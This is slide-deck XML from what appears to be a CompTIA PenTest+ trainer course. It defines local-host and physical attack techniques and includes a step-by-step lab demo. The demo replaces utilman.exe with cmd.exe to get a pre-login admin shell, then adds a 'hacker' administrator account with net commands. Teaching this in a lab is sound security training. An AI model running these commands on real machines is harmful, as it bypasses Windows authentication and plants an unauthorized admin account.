            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Kerberoasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- any domain user account that has a service principal name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(SPN) set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>can have a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>service ticket (TGS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>for that SPN requested by any user in the domain, allowing for the offline cracking of the service account plaintext </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>See:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/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Privilege </a:t>
            </a:r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Windows-specific</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Credentials </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>LSASS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- Local Security Authority Subsystem Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing the security policy on the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unattended installation - Capture clear text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>credentials of PXE (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Preboot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Execution </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Environment) clients doing unattended installs over the network.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SAM database - Security Account Manager (SAM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a database file in Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>that stores </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>user passwords and it can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>authenticate local and remote users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DLL hijacking - is the technique in which instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the benign </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DLL usually loaded by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>application, the loader is tricked to load a malicious DLL. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>These techniques are also commonly used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>by malware to achieve persistence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DLLs are Dynamic-link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>libraries.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Privilege </a:t>
            </a:r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Exploitable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Unquoted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>paths - causes Windows to search a path for the file and attacker could place their malicious program earlier in path to get it executed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>C:\Servers\My Server\myserver.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malicious version in C:\Servers\My\myserver.exe would be found and executed first.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Writable services - can be replaced with custom service using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PSExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to run cmd.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unsecure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>file/folder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>permissions - in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>many versions of Windows, any application that gets installed on the root can be tampered with by a non-admin user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.  These types of permission errors can lead to DLL hijacking too.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Privilege </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- is a type of surveillance technology used to monitor and record each keystroke typed on a specific computer's keyboard.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scheduled tasks - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attacker could exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the Windows Task Manager vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to schedule a new task using the Windows Task Scheduler with a malicious Universal Naming Convention (UNC) path. An exploit could allow the attacker to execute arbitrary code with elevated privileges, which could result in a complete system compromise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kernel exploits - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unpatched</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Windows systems are vulnerable to many such exploits.  See:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://pentestlab.blog/2017/04/24/windows-kernel-exploits/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Default account </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>settings - default Guest and local Admin accounts can be exploited and used if not disabled.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sandbox escape - is a security mechanism for separating running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>programs such as the browser sandbox for keeping web applications secure.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Shell upgrade - Restricted shells such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rbash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> face many possible exploits which could lead to an upgraded shell.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>VM - Escaping the sandbox a VM is running in can lead to access to other VMs or the underlying system itself.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Container – Same principle with containers such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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239"/>
            <a:ext cx="8229600" cy="3394472"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Physical device security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cold </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>boot attack - is a type of side channel attack in which an attacker with physical access to a computer is able to retrieve encryption keys from a running operating system after using a cold reboot to restart the machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JTAG debug - JTAG is an IEEE standard for verifying designs and testing printed circuit boards after manufacture. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Nowadays </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>it finds more use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>programming, debug and probing port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.  The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hardware can be set up to provide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>breakpoints</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, the ability to read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>registers, as well as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>arbitrary memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>locations.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Serial console - If an attacker can get physical access to many devices such as routers, and the serial interface has not be disabled, they can easily can access to such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8992" y="4007875"/>
            <a:ext cx="187457" cy="273844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4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Welcome to the Train-the-Trainer Series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7165" y="3056081"/>
            <a:ext cx="19542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Stephen Schneiter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 Network Program Manager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3"/>
              </a:rPr>
              <a:t>sschneiter@comptia.org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4039" y="3056081"/>
            <a:ext cx="195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Tazneen Kasem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Director. Product Management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Network+, CTT+, Project+  &amp; CIN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4"/>
              </a:rPr>
              <a:t>tkasem@comptia.org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461648" y="4767264"/>
            <a:ext cx="196453" cy="27384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/>
          <a:p>
            <a:pPr algn="r" defTabSz="342900">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{91AF2B4D-6B12-4EDF-87BB-2B55CECB6611}" type="slidenum">
              <a:rPr lang="en-US" sz="675">
                <a:solidFill>
                  <a:srgbClr val="69727B"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr algn="r" defTabSz="342900">
                <a:defRPr/>
              </a:pPr>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="675" dirty="0">
              <a:solidFill>
                <a:srgbClr val="69727B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65" y="1874318"/>
            <a:ext cx="1040804" cy="1040804"/>
          </a:xfrm>
          <a:prstGeom prst="round1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38" y="1874317"/>
            <a:ext cx="1065298" cy="1065298"/>
          </a:xfrm>
          <a:prstGeom prst="round1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94F18D-8460-4514-A409-B3CE655B12C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1607345" y="3056082"/>
            <a:ext cx="18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T. Lee McWhorter, Jr.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IT Expert Generalist and Educator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hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>lee@mcwhortertechnologies.com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person standing in front of a building&#10;&#10;Description generated with very high confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17122E20-F3B1-4D8F-8447-BF0256C54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043" y="1874317"/>
            <a:ext cx="1049533" cy="1040805"/>
          </a:xfrm>
          <a:prstGeom prst="round1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5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Windows Local Host Physical Access Hack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08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reproduce this demo you will need Windows install media and a VM made with this disk or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.  If you do not have any other copy, you can get a 90 day trial of Windows 10 Enterprise from:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://www.microsoft.com/en-us/evalcenter/evaluate-windows-10-enterprise</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Set up your Windows virtual machine within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Virtualbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, do the install and make sure all is working.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>VirtualBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to boot from the virtual Optical disk before the Hard drive on the Settings / System screen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If not still attached from the install, add the install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> back under Storage.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 the VM so that it boots off the original install media.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Once the Setup begins, hit Shift+F10 to bring up a prompt and issue these commands:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>move d:\windows\system32\utilman.exe d:\windows\system32\utilman.exe.bak</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>copy d:\windows\system32\cmd.exe d:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>windows\system32\utilman.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then remove the virtual install media and/or change the boot order to once again boot from the Hard drive first in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>VirtualBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> settings and reboot with:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wpeutil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> reboot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click on the Utility Manager, should bring up an admin level prompt.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here you can use ‘ net ‘ commands to add a new admin user like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hacker /add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net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>localgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> administrators </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>add</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This seems to work in one way or another will all versions of Windows even if the steps are slightly different.  See:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://www.howtogeek.com/222262/how-to-reset-your-forgotten-password-in-windows-10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/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http://www.kieranlane.com/2013/09/18/resetting-administrator-password-windows-2012/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2859562"/>
            <a:ext cx="8888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3.6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Piggybacking/tailgating - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a physical security breach in which an unauthorized person follows an authorized individual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>secured </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>area.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fence </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>jumping -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Physically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>jumping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>over a fence to gain unauthorized access to a secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>area.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dumpster diving - is looking for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>useful information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>someone's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>trash. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Useful information in this context is anything that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>can be used in a future attack, exploit, or theft.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3.6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 picking - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>art </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>of unlocking a lock by manipulating the components of the lock device without the original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https://www.scribd.com/doc/205665803/Lockpicking-Detail-Overkill</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lock bypass - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>technique </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>lock picking in which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>lock is defeated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>through unlatching the underlying locking mechanism without operating the lock at all. It is commonly used on devices such as combination locks, where there is no natural access (such as a keyhole) for a tool to reach the locking mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.  The could involve either removing the lock itself with bolt cutters or by removing the object locked from another angle, such as removing a door from its frame.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Anyone else have lock picks or any experience in the area?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202011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3.6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Egress sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- usually refers to an electrically and/or electromagnetically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>locked doors, where the lock is released by a sensor detecting an approaching </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>occupant seeking to exit the area.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Badge cloning - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>making </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a copy of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RFID or other type of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>badge so that it can be used to gain access to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>area.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Attacks and Exploits – Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3.7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966142"/>
            <a:ext cx="87614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565275" y="1063229"/>
            <a:ext cx="2477729" cy="3685189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vert="horz" lIns="0" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:no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 smtClean="0"/>
              <a:t>Local host vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Post-exploitation techniques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AC7341-4D89-494D-B58E-07B291B5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8953"/>
            <a:ext cx="3593306" cy="2914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105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3.7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movement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RPC/DCOM - Remote Procedure Call / Distributed Component Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-026</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PsExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> - is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
